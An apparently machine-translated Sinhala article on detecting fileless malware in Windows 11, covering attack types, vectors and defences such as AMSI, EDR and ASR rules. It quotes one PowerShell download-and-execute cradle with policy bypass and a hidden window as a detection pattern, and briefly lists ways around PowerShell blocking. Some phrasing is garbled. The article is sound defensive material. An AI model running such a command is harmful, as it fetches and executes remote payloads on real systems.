Windows 11 හි භයානක ගොනු රහිත අනිෂ්ට මෘදුකාංග හඳුනා ගන්නේ කෙසේද

¿භයානක ගොනු රහිත අනිෂ්ට මෘදුකාංග හඳුනා ගන්නේ කෙසේද? ගොනු රහිත ප්‍රහාර ක්‍රියාකාරකම් සැලකිය යුතු ලෙස වර්ධනය වී ඇති අතර, තත්වය තවත් නරක අතට හැරෙමින්, Windows 11 වලට ප්‍රතිශක්තියක් නැත.මෙම ප්‍රවේශය තැටිය මඟ හරින අතර මතකය සහ නීත්‍යානුකූල පද්ධති මෙවලම් මත රඳා පවතී; ඒ නිසා අත්සන මත පදනම් වූ ප්‍රති-වයිරස වැඩසටහන් අරගල කරයි. ඔබ එය හඳුනා ගැනීමට විශ්වාසදායක ක්‍රමයක් සොයන්නේ නම්, පිළිතුර ඒකාබද්ධ කිරීම තුළ පවතී දුරමිතිය, හැසිරීම් විශ්ලේෂණය සහ වින්ඩෝස් පාලන.

වත්මන් පරිසර පද්ධතිය තුළ, PowerShell, WMI, හෝ Mshta අනිසි ලෙස භාවිතා කරන ව්‍යාපාර මතක එන්නත්, තැටිය "ස්පර්ශ නොකර" නොනවත්වා පැවතීම වැනි වඩාත් නවීන ශිල්පීය ක්‍රම සමඟ සහජීවනයෙන් පවතී. ස්ථිරාංග අපයෝජනRAM එක තුළ සියල්ල සිදු වූ විට පවා තර්ජන සිතියම, ප්‍රහාර අවධීන් සහ ඒවායින් පිටවන සංඥා මොනවාද යන්න තේරුම් ගැනීම යතුරයි.

ගොනු රහිත අනිෂ්ට මෘදුකාංග යනු කුමක්ද සහ එය Windows 11 හි කනස්සල්ලට කරුණක් වන්නේ ඇයි?

අපි "ගොනු රහිත" තර්ජන ගැන කතා කරන විට, අපි යොමු දක්වන්නේ අනිෂ්ට කේතයක් ගැනයි, එය ඔබට නව ක්‍රියාත්මක කළ හැකි ගොනු තැන්පත් කිරීමට අවශ්‍ය නොවේ. ගොනු පද්ධතිය තුළ ක්‍රියාත්මක වීමට. එය සාමාන්‍යයෙන් ක්‍රියාත්මක වන ක්‍රියාවලීන් තුළට එන්නත් කර RAM තුළ ක්‍රියාත්මක කරනු ලැබේ, මයික්‍රොසොෆ්ට් විසින් අත්සන් කරන ලද පරිවර්තක සහ ද්විමය ගොනු මත රඳා පවතී (උදා., පවර්ෂෙල්, WMI, rundll32, mshtaමෙය ඔබගේ ප්‍රවේශ පත්‍රය අඩු කරන අතර සැක සහිත ගොනු පමණක් සොයන එන්ජින් මඟ හැරීමට ඔබට ඉඩ සලසයි.

විධාන දියත් කිරීම සඳහා අවදානම් උපයෝගී කර ගන්නා කාර්යාල ලේඛන හෝ PDF පවා සංසිද්ධියේ කොටසක් ලෙස සැලකේ, මන්ද මතකයේ ක්‍රියාත්මක කිරීම සක්‍රිය කරන්න විශ්ලේෂණය සඳහා ප්‍රයෝජනවත් ද්විමය ලිපින ඉතිරි නොකර. අපයෝජනය මැක්‍රෝස් සහ DDE කාර්යාලයේදී, කේතය WinWord වැනි නීත්‍යානුකූල ක්‍රියාවලීන් තුළ ක්‍රියාත්මක වන බැවින්.

ප්‍රහාරකයින් සමාජ ඉංජිනේරු විද්‍යාව (තතුබෑම්, ස්පෑම් සබැඳි) තාක්ෂණික උගුල් සමඟ ඒකාබද්ධ කරයි: පරිශීලකයාගේ ක්ලික් කිරීම මඟින් ස්ක්‍රිප්ට් එකක් මතකයේ අවසාන ගෙවීම බාගත කර ක්‍රියාත්මක කරන දාමයක් ආරම්භ කරයි, හෝඩුවාවක් ඉතිරි කිරීමෙන් වැළකී සිටීම තැටිය මත. අරමුණු දත්ත සොරකමේ සිට ransomware ක්‍රියාත්මක කිරීම දක්වා, නිහඬ පාර්ශ්වීය චලනය දක්වා විහිදේ.

පද්ධතියේ පියසටහන අනුව වර්ගීකරණයන්: 'පිරිසිදු' සිට දෙමුහුන් දක්වා

ව්‍යාකූල සංකල්ප වළක්වා ගැනීම සඳහා, ගොනු පද්ධතිය සමඟ ඇති අන්තර්ක්‍රියා මට්ටම අනුව තර්ජන වෙන් කිරීම උපකාරී වේ. මෙම වර්ගීකරණය පැහැදිලි කරයි පවතින්නේ කුමක්ද, කේතය ජීවත් වන්නේ කොහේද, සහ එය තබන සලකුණු මොනවාද?.

I වර්ගය: ගොනු ක්‍රියාකාරකමක් නොමැත

සම්පූර්ණයෙන්ම ගොනු රහිත අනිෂ්ට මෘදුකාංග තැටියට කිසිවක් ලියන්නේ නැත. සම්භාව්‍ය උදාහරණයක් වන්නේ ජාල අවදානම (ඒ කාලේ EternalBlue දෛශිකය වගේ) කර්නල් මතකයේ (DoublePulsar වගේ අවස්ථා) රැඳී සිටින backdoor එකක් ක්‍රියාත්මක කිරීමට. මෙහිදී, සියල්ල RAM එකේ සිදුවන අතර ගොනු පද්ධතියේ කිසිදු කෞතුක වස්තුවක් නොමැත.

තවත් විකල්පයක් වන්නේ ස්ථිරාංගය සංරචක: BIOS/UEFI, ජාල ඇඩැප්ටර, USB පර්යන්ත (BadUSB-වර්ගයේ ශිල්පීය ක්‍රම) හෝ CPU උප පද්ධති පවා. ඒවා නැවත ආරම්භ කිරීම් සහ නැවත ස්ථාපනය කිරීම් හරහා දිගටම පවතින අතර, අමතර දුෂ්කරතා සමඟ ස්ථිරාංග පරීක්ෂා කරන නිෂ්පාදන ස්වල්පයක්මේවා සංකීර්ණ ප්‍රහාර, අඩු වාර ගණනක් සිදු වන නමුත්, ඒවායේ රහසිගතභාවය සහ කල්පැවැත්ම නිසා භයානක ය.

වර්ගය II: වක්‍ර ලේඛනාගාර ක්‍රියාකාරකම්

මෙහිදී, malware තමන්ගේම ක්‍රියාත්මක කළ හැකි මෘදුකාංග "ඉවත් නොකරයි", නමුත් අත්‍යවශ්‍යයෙන්ම ගොනු ලෙස ගබඩා කර ඇති පද්ධති-කළමනාකරණය කළ බහාලුම් භාවිතා කරයි. උදාහරණයක් ලෙස, powershell විධාන WMI ගබඩාව තුළ සහ සිදුවීම් පෙරහන් සමඟ එහි ක්‍රියාත්මක කිරීම ආරම්භ කරන්න. ද්විමය ගොනු අතහැරීමෙන් තොරව විධාන රේඛාවෙන් එය ස්ථාපනය කළ හැකි නමුත් WMI ගබඩාව තැටියේ නීත්‍යානුකූල දත්ත සමුදායක් ලෙස පවතින බැවින් පද්ධතියට බලපෑමක් නොකර පිරිසිදු කිරීම අපහසු වේ.

ප්‍රායෝගික දෘෂ්ටි කෝණයකින් ඒවා ගොනු රහිත ලෙස සැලකේ, මන්ද එම බහාලුම (WMI, රෙජිස්ට්‍රි, ආදිය) එය සම්භාව්‍ය හඳුනාගත හැකි ක්‍රියාත්මක කළ හැකි ගොනුවක් නොවේ. තවද එහි පිරිසිදු කිරීම සුළුපටු නොවේ. ප්‍රතිඵලය: "සාම්ප්‍රදායික" හෝඩුවාවක් නොමැතිව රහසිගත නොපසුබට උත්සාහය.

III වර්ගය: ක්‍රියාත්මක වීමට ගොනු අවශ්‍ය වේ

සමහර අවස්ථා a පවත්වාගෙන යයි 'ගොනු රහිත' නොනැසී පැවතීම තාර්කික මට්ටමින්, ඔවුන්ට ගොනු-පාදක ප්‍රේරකයක් අවශ්‍ය වේ. සාමාන්‍ය උදාහරණය වන්නේ Kovter ය: එය අහඹු දිගුවක් සඳහා shell ක්‍රියා පදයක් ලියාපදිංචි කරයි; එම දිගුව සහිත ගොනුවක් විවෘත කළ විට, mshta.exe භාවිතා කරන කුඩා ස්ක්‍රිප්ට් එකක් දියත් කරනු ලැබේ, එය රෙජිස්ට්‍රියේ ඇති අනිෂ්ට නූල නැවත ගොඩනඟයි.

උපක්‍රමය නම් අහඹු දිගු සහිත මෙම "ඇම" ගොනු වල විශ්ලේෂණය කළ හැකි ගෙවීමක් අඩංගු නොවන අතර කේතයේ වැඩි කොටසක් පවතින්නේ ලියාපදිංචි (තවත් බහාලුමක්). දැඩි ලෙස කිවහොත් ඒවා ප්‍රේරකයක් ලෙස තැටි කෞතුක වස්තු එකක් හෝ කිහිපයක් මත රඳා පැවතුනද, බලපෑම අනුව ඒවා ගොනු රහිත ලෙස වර්ගීකරණය කර ඇත්තේ එබැවිනි.

ආසාදන වාහකයන් සහ 'ධාරක': එය ඇතුළු වන ස්ථානය සහ එය සැඟවී ඇති ස්ථානය

හඳුනාගැනීම වැඩිදියුණු කිරීම සඳහා, ඇතුල්වීමේ ස්ථානය සහ ආසාදනයේ ධාරකයා සිතියම්ගත කිරීම අත්‍යවශ්‍ය වේ. මෙම ඉදිරිදර්ශනය සැලසුම් කිරීමට උපකාරී වේ නිශ්චිත පාලනයන් සුදුසු දුරමිතියට ප්‍රමුඛත්වය දෙන්න.

වීර

• ගොනු-පාදක (III වර්ගය): ලේඛන, ක්‍රියාත්මක කළ හැකි ගොනු, උරුම ෆ්ලෑෂ්/ජාවා ගොනු, හෝ LNK ගොනු, බ්‍රවුසරය හෝ ඒවා සකසන එන්ජිම භාවිතයෙන් shellcode මතකයට පූරණය කළ හැක. පළමු දෛශිකය ගොනුවකි, නමුත් බර RAM වෙත ගමන් කරයි.
• ජාලය පදනම් කරගත් (වර්ගය I): අවදානමක් උපයෝගී කර ගන්නා පැකේජයක් (උදා: SMB හි) පරිශීලක භූමියේ හෝ කර්නලයේ ක්‍රියාත්මක වේ. WannaCry මෙම ප්‍රවේශය ජනප්‍රිය කළේය. සෘජු මතක පැටවීම නව ගොනුවක් නොමැතිව.

දෘඩාංග

• උපකරණ (වර්ගය I): තැටි හෝ ජාල කාඩ්පත් ස්ථිරාංග වෙනස් කර කේතය හඳුන්වා දිය හැකිය. පරීක්ෂා කිරීමට අපහසු වන අතර මෙහෙයුම් පද්ධතියෙන් පිටත පවතී.
• CPU සහ කළමනාකරණ උප පද්ධති (වර්ගය I): ඉන්ටෙල් හි ME/AMT වැනි තාක්ෂණයන් මගින් මාර්ග පෙන්නුම් කර ඇත මෙහෙයුම් පද්ධතියෙන් පිටත ජාලකරණය සහ ක්‍රියාත්මක කිරීමඑය ඉතා පහළ මට්ටමකින් පහර දෙන අතර, ඉහළ රහසිගත හැකියාවක් ඇත.
• USB (වර්ගය I): BadUSB මඟින් ඔබට යතුරුපුවරුවක් හෝ NIC එකක් ලෙස පෙනී සිටීමට සහ විධාන දියත් කිරීමට හෝ ගමනාගමනය හරවා යැවීමට USB ධාවකයක් නැවත ක්‍රමලේඛනය කිරීමට ඉඩ සලසයි.
• BIOS / UEFI (වර්ගය I): Windows ආරම්භ වීමට පෙර ක්‍රියාත්මක වන අනිෂ්ට ස්ථිරාංග නැවත ක්‍රමලේඛනය (මෙබ්‍රෝමි වැනි අවස්ථා).
• හයිපර්වයිසර් (වර්ගය I): එහි පැවැත්ම සැඟවීමට මෙහෙයුම් පද්ධතියට යටින් කුඩා-හයිපර්වයිසරයක් ක්‍රියාත්මක කිරීම. දුර්ලභ, නමුත් දැනටමත් හයිපර්වයිසර් රූට්කිට් ආකාරයෙන් නිරීක්ෂණය කර ඇත.

ක්‍රියාත්මක කිරීම සහ එන්නත් කිරීම

• ගොනු-පාදක (III වර්ගය): නීත්‍යානුකූල ක්‍රියාවලීන් තුළට එන්නත් දියත් කරන EXE/DLL/LNK හෝ නියමිත කාර්යයන්.
• මැක්රෝස් (වර්ගය III): Office හි VBA හට රැවටීම හරහා පරිශීලකයාගේ කැමැත්ත ඇතිව, සම්පූර්ණ ransomware ඇතුළු ගෙවීම් විකේතනය කර ක්‍රියාත්මක කළ හැක.
• පිටපත් (වර්ගය II): ගොනුවෙන්, විධාන රේඛාවෙන්, PowerShell, VBScript හෝ JScript, සේවා, ලියාපදිංචිය හෝ WMIප්‍රහාරකයාට තැටිය ස්පර්ශ නොකර දුරස්ථ සැසියකදී ස්ක්‍රිප්ට් එක ටයිප් කළ හැක.
• ආරම්භක වාර්තාව (MBR/ආරම්භක) (වර්ගය II): පෙටියා වැනි පවුල් ආරම්භයේදී පාලනය ලබා ගැනීම සඳහා ඇරඹුම් අංශය උඩින් ලියයි. එය ගොනු පද්ධතියෙන් පිටත පිහිටා ඇත, නමුත් එය ප්‍රතිස්ථාපනය කළ හැකි OS සහ නවීන විසඳුම් සඳහා ප්‍රවේශ විය හැකිය.

ගොනු රහිත ප්‍රහාර ක්‍රියාත්මක වන ආකාරය: අදියර සහ සංඥා

ඒවා ක්‍රියාත්මක කළ හැකි ගොනු ඉතිරි නොකළත්, ව්‍යාපාර අදියර තර්කනයක් අනුගමනය කරයි. ඒවා තේරුම් ගැනීමෙන් නිරීක්ෂණය කිරීමට ඉඩ සලසයි. ක්‍රියාවලීන් අතර සිදුවීම් සහ සම්බන්ධතා එය සලකුණක් ඉතිරි කරයි.

• මූලික ප්‍රවේශයසබැඳි හෝ ඇමුණුම්, අවදානමට ලක් වූ වෙබ් අඩවි හෝ සොරකම් කරන ලද අක්තපත්‍ර භාවිතා කරමින් තතුබෑම් ප්‍රහාර. බොහෝ දාමයන් ආරම්භ වන්නේ විධානයක් ක්‍රියාත්මක කරන Office ලේඛනයකින් ය. PowerShell.
• නොපසුබට උත්සාහය: WMI හරහා පසුපස දොරවල් (පෙරහන් සහ දායකත්වයන්), රෙජිස්ට්‍රි ක්‍රියාත්මක කිරීමේ යතුරු හෝ නව අනිෂ්ට ගොනුවක් නොමැතිව ස්ක්‍රිප්ට් නැවත දියත් කරන කාලසටහන්ගත කාර්යයන්.
• පිටකිරීමතොරතුරු රැස් කළ පසු, එය ගමනාගමනය මිශ්‍ර කිරීම සඳහා විශ්වාසදායක ක්‍රියාවලීන් (බ්‍රව්සර්, පවර්ෂෙල්, බිට්ස්ඇඩ්මින්) භාවිතයෙන් ජාලයෙන් පිටතට යවනු ලැබේ.

මෙම රටාව විශේෂයෙන් ද්‍රෝහී වන්නේ ප්‍රහාරක දර්ශක ඒවා සාමාන්‍ය තත්ත්වයෙන් සැඟවී ඇත: විධාන රේඛා තර්ක, ක්‍රියාවලි දාමකරණය, විෂම පිටතට යන සම්බන්ධතා, හෝ එන්නත් API වෙත ප්‍රවේශය.

පොදු ශිල්පීය ක්‍රම: මතකයේ සිට පටිගත කිරීම දක්වා

නළු නිළියන් විවිධ පරාසයන් මත රඳා පවතී ක්‍රම ස්ටෙල්ත් ප්‍රශස්ත කරන. ඵලදායී අනාවරණය සක්‍රිය කිරීම සඳහා වඩාත් පොදු ඒවා දැන ගැනීම ප්‍රයෝජනවත් වේ.

• මතකයේ පදිංචිකරු: සක්‍රිය කිරීම සඳහා රැඳී සිටින විශ්වාසදායක ක්‍රියාවලියක අවකාශයට ගෙවීම් පැටවීම. රූට්කිට් සහ කොකු කර්නලය තුළ, ඔවුන් සැඟවීමේ මට්ටම ඉහළ නංවයි.
• ලේඛනාගාරයේ නොපසුබට උත්සාහයසංකේතනය කළ බ්ලොබ් යතුරු තුළ සුරකින්න සහ ඒවා නීත්‍යානුකූල දියත් කිරීමකින් (mshta, rundll32, wscript) නැවත සජලනය කරන්න. තාවකාලික ස්ථාපකයට එහි පියසටහන අවම කිරීම සඳහා ස්වයං-විනාශ විය හැක.
• අක්තපත්‍ර තතුබෑමසොරකම් කරන ලද පරිශීලක නාම සහ මුරපද භාවිතා කරමින්, ප්‍රහාරකයා දුරස්ථ කවච සහ පැල ක්‍රියාත්මක කරයි. නිහඬ ප්‍රවේශය රෙජිස්ට්‍රි හෝ WMI හි.
• 'ගොනු රහිත' රැන්සම්වෙයාර්සංකේතනය සහ C2 සන්නිවේදනය RAM වලින් සංවිධානය කර ඇති අතර, හානිය දෘශ්‍යමාන වන තෙක් අනාවරණය කර ගැනීමේ අවස්ථා අඩු කරයි.
• මෙහෙයුම් කට්ටල: පරිශීලකයා ක්ලික් කිරීමෙන් පසු අවදානම් හඳුනාගෙන මතකය පමණක් භාවිතා කරන ගෙවීම් යොදවන ස්වයංක්‍රීය දාම.
• කේතය සහිත ලේඛන: ක්‍රියාත්මක කළ හැකි ගොනු තැටියට සුරැකීමකින් තොරව විධාන ක්‍රියාත්මක කරන DDE වැනි මැක්‍රෝ සහ යාන්ත්‍රණ.

කර්මාන්ත අධ්‍යයනයන් දැනටමත් කැපී පෙනෙන උච්චතම අවස්ථා පෙන්නුම් කර ඇත: 2018 වසරේ එක් කාල පරිච්ඡේදයකදී, a 90%කට වැඩි වැඩිවීමක් ස්ක්‍රිප්ට්-පාදක සහ පවර්ෂෙල් දාම ප්‍රහාර වලදී, දෛශිකය එහි කාර්යක්ෂමතාව සඳහා වඩාත් කැමති බවට ලකුණකි.

සමාගම් සහ සැපයුම්කරුවන් සඳහා ඇති අභියෝගය: අවහිර කිරීම ප්‍රමාණවත් නොවන්නේ ඇයි

PowerShell අක්‍රිය කිරීමට හෝ මැක්‍රෝ සදහටම තහනම් කිරීමට පෙළඹවීමක් ඇති කරයි, නමුත් ඔයා මෙහෙයුම කඩනවා.පවර්ෂෙල් යනු නූතන පරිපාලනයේ කුළුණක් වන අතර කාර්යාලය ව්‍යාපාරයට අත්‍යවශ්‍ය වේ; අන්ධ ලෙස අවහිර කිරීම බොහෝ විට කළ නොහැකි ය.

තවද, මූලික පාලනයන් මඟ හැරීමට ක්‍රම තිබේ: DLL සහ rundll32 හරහා PowerShell ධාවනය කිරීම, EXE වලට ස්ක්‍රිප්ට් ඇසුරුම් කිරීම, ඔබේම PowerShell පිටපතක් රැගෙන එන්න. නැතහොත් රූපවල ස්ක්‍රිප්ට් සඟවා ඒවා මතකයට උපුටා ගැනීම පවා කළ හැකිය. එබැවින්, ආරක්ෂාව මෙවලම්වල පැවැත්ම ප්‍රතික්ෂේප කිරීම මත පමණක් පදනම් විය නොහැක.

තවත් පොදු වැරැද්දක් නම් සම්පූර්ණ තීරණය වලාකුළට පැවරීමයි: නියෝජිතයාට සේවාදායකයෙන් ප්‍රතිචාරයක් ලැබෙන තෙක් බලා සිටීමට සිදුවුවහොත්, ඔබට තත්‍ය කාලීන වැළැක්වීම අහිමි වේතොරතුරු පොහොසත් කිරීම සඳහා දුරමිතික දත්ත උඩුගත කළ හැකි නමුත්, අවම කිරීම අන්ත ලක්ෂ්‍යයේදී සිදුවිය යුතුය..

Windows 11 හි ගොනු රහිත අනිෂ්ට මෘදුකාංග හඳුනා ගන්නේ කෙසේද: දුරස්ථමිතිය සහ හැසිරීම

ජයග්‍රාහී උපාය මාර්ගය වන්නේ ක්‍රියාවලි සහ මතකය නිරීක්ෂණය කරන්නගොනු නොවේ. ගොනුවක් ගන්නා ආකාරවලට වඩා අනිෂ්ට හැසිරීම් වඩාත් ස්ථායී වන අතර, ඒවා වැළැක්වීමේ එන්ජින් සඳහා වඩාත් සුදුසු වේ.

• AMSI (අනිෂ්ට මෘදුකාංග පරිලෝකන අතුරුමුහුණත)එය PowerShell, VBScript, හෝ JScript ස්ක්‍රිප්ට් මතකයේ ගතිකව ගොඩනගා ඇති විට පවා ඒවා බාධා කරයි. ක්‍රියාත්මක කිරීමට පෙර අපැහැදිලි නූල් ග්‍රහණය කර ගැනීම සඳහා විශිෂ්ටයි.
• ක්‍රියාවලි අධීක්ෂණය: ආරම්භය/අවසන් කිරීම, PID, දෙමාපියන් සහ දරුවන්, මාර්ග, විධාන රේඛා සහ හැෂ්, ඊට අමතරව සම්පූර්ණ කතාව තේරුම් ගැනීමට ක්‍රියාත්මක කිරීමේ ගස්.
• මතක විශ්ලේෂණය: තැටිය ස්පර්ශ නොකර එන්නත්, පරාවර්තක හෝ PE පැටවීම් හඳුනා ගැනීම සහ අසාමාන්‍ය ක්‍රියාත්මක කළ හැකි කලාප සමාලෝචනය කිරීම.
• ආරම්භක අංශ ආරක්ෂාව: හානි සිදුවුවහොත් MBR/EFI පාලනය සහ ප්‍රතිසංස්කරණය.

මයික්‍රොසොෆ්ට් පරිසර පද්ධතිය තුළ, ඩිෆෙන්ඩර් ෆෝ එන්ඩ්පොයින්ට් AMSI ඒකාබද්ධ කරයි, හැසිරීම් නිරීක්ෂණයමතක ස්කෑන් කිරීම සහ වලාකුළු මත පදනම් වූ යන්ත්‍ර ඉගෙනීම නව හෝ අපැහැදිලි ප්‍රභේදවලට එරෙහිව අනාවරණ පරිමාණය කිරීමට භාවිතා කරයි. අනෙකුත් වෙළෙන්දෝ කර්නල්-නේවාසික එන්ජින් සමඟ සමාන ප්‍රවේශයන් භාවිතා කරති.

සහසම්බන්ධතාවයේ යථාර්ථවාදී උදාහරණය: ලේඛනයේ සිට පවර්ෂෙල් දක්වා

Outlook ඇමුණුමක් බාගත කරන, Word ලේඛනය විවෘත කරන, ක්‍රියාකාරී අන්තර්ගතය සක්‍රීය කරන සහ සැක සහිත පරාමිතීන් සමඟ PowerShell දියත් කරන දාමයක් ගැන සිතන්න. නිසි දුරමිතිය මඟින් විධාන රේඛාව (උදා: ක්‍රියාත්මක කිරීමේ ප්‍රතිපත්ති මඟ හැරීම, සැඟවුණු කවුළුව), විශ්වාස නොකළ වසමකට සම්බන්ධ වී AppData තුළ එයම ස්ථාපනය වන ළමා ක්‍රියාවලියක් නිර්මාණය කිරීම.

දේශීය සන්දර්භය සහිත නියෝජිතයෙකුට හැකියාව ඇත්තේ නතර කර ආපසු හැරවීම SIEM වෙත දැනුම් දීමට හෝ විද්‍යුත් තැපෑල/SMS හරහා දැනුම් දීමට අමතරව, අතින් මැදිහත් වීමකින් තොරව ද්වේෂසහගත ක්‍රියාකාරකම්. සමහර නිෂ්පාදන මූල හේතු ආරෝපණ ස්ථරයක් (StoryLine-වර්ගයේ ආකෘති) එක් කරයි, එය දෘශ්‍ය ක්‍රියාවලියට (Outlook/Word) නොව, සම්පූර්ණ ද්වේෂසහගත නූල සහ එහි ආරම්භය පද්ධතිය පුළුල් ලෙස පිරිසිදු කිරීම සඳහා ය.

අවධානයෙන් සිටිය යුතු සාමාන්‍ය විධාන රටාවක් මේ වගේ විය හැකිය: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object Net.WebClient).DownloadString('http//dominiotld/payload');තර්කනය හරියටම නූල් නොවේ, නමුත් සංඥා කට්ටලය: ප්‍රතිපත්ති මඟ හැරීම, සැඟවුණු කවුළුව, පැහැදිලි බාගත කිරීම සහ මතකය තුළ ක්‍රියාත්මක කිරීම.

AMSI, නල මාර්ගය සහ එක් එක් නළුවාගේ භූමිකාව: අන්ත ලක්ෂ්‍යයේ සිට SOC දක්වා

ස්ක්‍රිප්ට් ග්‍රහණයෙන් ඔබ්බට, ශක්තිමත් ගෘහ නිර්මාණ ශිල්පයක් විමර්ශනය සහ ප්‍රතිචාර දැක්වීමට පහසුකම් සපයන පියවර සංවිධානය කරයි. භාරය ක්‍රියාත්මක කිරීමට පෙර සාක්ෂි වැඩි වන තරමට වඩා හොඳය., හොඳම.

• ස්ක්‍රිප්ට් අන්තර්ග්‍රහණයAMSI විසින් අන්තර්ගතය (එය ක්ෂණිකව ජනනය කළත්) අනිෂ්ට මෘදුකාංග නල මාර්ගයක ස්ථිතික සහ ගතික විශ්ලේෂණය සඳහා ලබා දෙයි.
• ක්‍රියාවලි සිදුවීම්PID, ද්විමය, හැෂ්, මාර්ග සහ අනෙකුත් දත්ත රැස් කරනු ලැබේ. තර්ක, අවසාන භාරයට හේතු වූ ක්‍රියාවලි ගස් ස්ථාපිත කිරීම.
• අනාවරණය කර ගැනීම සහ වාර්තා කිරීමහඳුනාගැනීම් නිෂ්පාදන කොන්සෝලය මත ප්‍රදර්ශනය කර ව්‍යාපාර දෘශ්‍යකරණය සඳහා ජාල වේදිකා (NDR) වෙත යොමු කරනු ලැබේ.
• පරිශීලක සහතිකස්ක්‍රිප්ට් එකක් මතකයට එන්නත් කළත්, රාමුව AMSI එය වළක්වයි අනුකූල Windows අනුවාද වල.
• පරිපාලක හැකියාවන්: ස්ක්‍රිප්ට් පරීක්ෂාව සක්‍රීය කිරීම සඳහා ප්‍රතිපත්ති වින්‍යාසය, හැසිරීම් මත පදනම් වූ අවහිර කිරීම සහ කොන්සෝලයෙන් වාර්තා නිර්මාණය කිරීම.
• SOC වැඩ: ඉතිහාසය ප්‍රතිනිර්මාණය කිරීම සඳහා කෞතුක වස්තු (VM UUID, OS අනුවාදය, ස්ක්‍රිප්ට් වර්ගය, ආරම්භක ක්‍රියාවලිය සහ එහි මාපිය, හැෂ් සහ විධාන රේඛා) නිස්සාරණය කිරීම සහ සෝපාන නීති අනාගතය.

වේදිකාව අපනයනය කිරීමට ඉඩ දෙන විට මතක බෆරය ක්‍රියාත්මක කිරීම හා සම්බන්ධ, පර්යේෂකයන්ට නව හඳුනාගැනීම් ජනනය කළ හැකි අතර සමාන ප්‍රභේදවලට එරෙහිව ආරක්ෂාව පොහොසත් කළ හැකිය.

Windows 11 හි ප්‍රායෝගික පියවර: වැළැක්වීම සහ දඩයම් කිරීම

මතක පරීක්ෂාව සහ AMSI සහිත EDR තිබීමට අමතරව, Windows 11 මඟින් ඔබට ප්‍රහාරක අවකාශයන් වසා දැමීමට සහ දෘශ්‍යතාව වැඩි දියුණු කිරීමට ඉඩ සලසයි ස්වදේශීය පාලනයන්.

• PowerShell හි ලියාපදිංචිය සහ සීමා කිරීම්ස්ක්‍රිප්ට් බ්ලොක් ලොග් කිරීම සහ මොඩියුල ලොග් කිරීම සක්‍රීය කරයි, හැකි සෑම විටම සීමා කළ මාතයන් යොදයි, සහ භාවිතය පාලනය කරයි මඟ හැරීම/සැඟවුණු.
• ප්‍රහාර මතුපිට අඩු කිරීමේ (ASR) නීති: කාර්යාල ක්‍රියාවලි මගින් ස්ක්‍රිප්ට් දියත් කිරීම් අවහිර කරයි සහ WMI අපයෝජනය/PSExec අවශ්‍ය නොවන විට.
• කාර්යාල සාර්ව ප්‍රතිපත්ති: පෙරනිමියෙන් අක්‍රීය කරයි, අභ්‍යන්තර සාර්ව අත්සන් කිරීම සහ දැඩි විශ්වාස ලැයිස්තු; උරුම DDE ප්‍රවාහ නිරීක්ෂණය කරයි.
• WMI විගණනය සහ ලේඛකාධිකාරය: සිදුවීම් දායකත්වයන් සහ ස්වයංක්‍රීය ක්‍රියාත්මක කිරීමේ යතුරු (Run, RunOnce, Winlogon) මෙන්ම කාර්ය නිර්මාණය නිරීක්ෂණය කරයි. කාලසටහන්ගත කර ඇත.
• ආරම්භක ආරක්ෂාව: ආරක්ෂිත ඇරඹුම සක්‍රිය කරයි, MBR/EFI අඛණ්ඩතාව පරීක්ෂා කරයි සහ ආරම්භයේදී කිසිදු වෙනස් කිරීමක් නොමැති බව වලංගු කරයි.
• පැච් කිරීම සහ දැඩි කිරීම: බ්‍රව්සර්, කාර්යාල සංරචක සහ ජාල සේවා වල සූරාකෑමට ලක්විය හැකි අවදානම් වසා දමයි.
• දැනුවත්භාවය: පරිශීලකයින් සහ තාක්ෂණික කණ්ඩායම් තතුබෑම් සහ සංඥා පිළිබඳව පුහුණු කරයි රහසිගත මරණ දඬුවම්.

දඩයම් කිරීම සඳහා, පහත සඳහන් ප්‍රශ්න කෙරෙහි අවධානය යොමු කරන්න: PowerShell/MSHTA දෙසට Office විසින් ක්‍රියාවලි නිර්මාණය කිරීම, තර්ක සමඟ බාගැනීම් තන්තුව/බාගැනීමේ ගොනුවපැහැදිලි අපැහැදිලි කිරීම්, පරාවර්තක එන්නත් සහ සැක සහිත TLD වෙත පිටතට යන ජාල සහිත ස්ක්‍රිප්ට්. ශබ්දය අඩු කිරීම සඳහා කීර්තිය සහ සංඛ්‍යාතය සහිත මෙම සංඥා හරස් යොමු කරන්න.

අද සෑම එන්ජිමකටම හඳුනාගත හැක්කේ කුමක්ද?

මයික්‍රොසොෆ්ට් හි ව්‍යවසාය විසඳුම් AMSI, හැසිරීම් විශ්ලේෂණ, ඒකාබද්ධ කරයි, මතකය පරීක්ෂා කරන්න සහ ඇරඹුම් අංශයේ ආරක්ෂාව, නැගී එන තර්ජන වලට එරෙහිව පරිමාණය කිරීම සඳහා වලාකුළු-පාදක ML ආකෘති. අනෙකුත් වෙළෙන්දෝ වෙනස්කම් ස්වයංක්‍රීයව ආපසු හැරවීම සමඟ අනිෂ්ට මෘදුකාංග සහ මෘදු මෘදුකාංග වෙන්කර හඳුනා ගැනීමට කර්නල් මට්ටමේ අධීක්ෂණය ක්‍රියාත්මක කරති.

පදනම් කරගත් ප්‍රවේශයකි ක්‍රියාත්මක කිරීමේ කතා එය ඔබට මූල හේතුව හඳුනා ගැනීමට ඉඩ සලසයි (උදාහරණයක් ලෙස, දාමයක් අවුලුවන Outlook ඇමුණුමක්) සහ සම්පූර්ණ ගස අවම කිරීමට: ස්ක්‍රිප්ට්, යතුරු, කාර්යයන් සහ අතරමැදි ද්විමය, දෘශ්‍යමාන රෝග ලක්ෂණයේ සිරවී සිටීම වළක්වා ගැනීමට.

පොදු වැරදි සහ ඒවා වළක්වා ගන්නේ කෙසේද

විකල්ප කළමනාකරණ සැලැස්මක් නොමැතිව PowerShell අවහිර කිරීම ප්‍රායෝගික නොවනවා පමණක් නොව, ඒවා ද තිබේ එය වක්‍රව කැඳවීමේ ක්‍රමමැක්‍රෝ සඳහාද මෙය අදාළ වේ: එක්කෝ ඔබ ඒවා ප්‍රතිපත්ති සහ අත්සන් සමඟ කළමනාකරණය කළ යුතුය, නැතහොත් ව්‍යාපාරයට හානි සිදුවනු ඇත. ටෙලිමෙට්‍රි සහ හැසිරීම් නීති කෙරෙහි අවධානය යොමු කිරීම වඩා හොඳය.

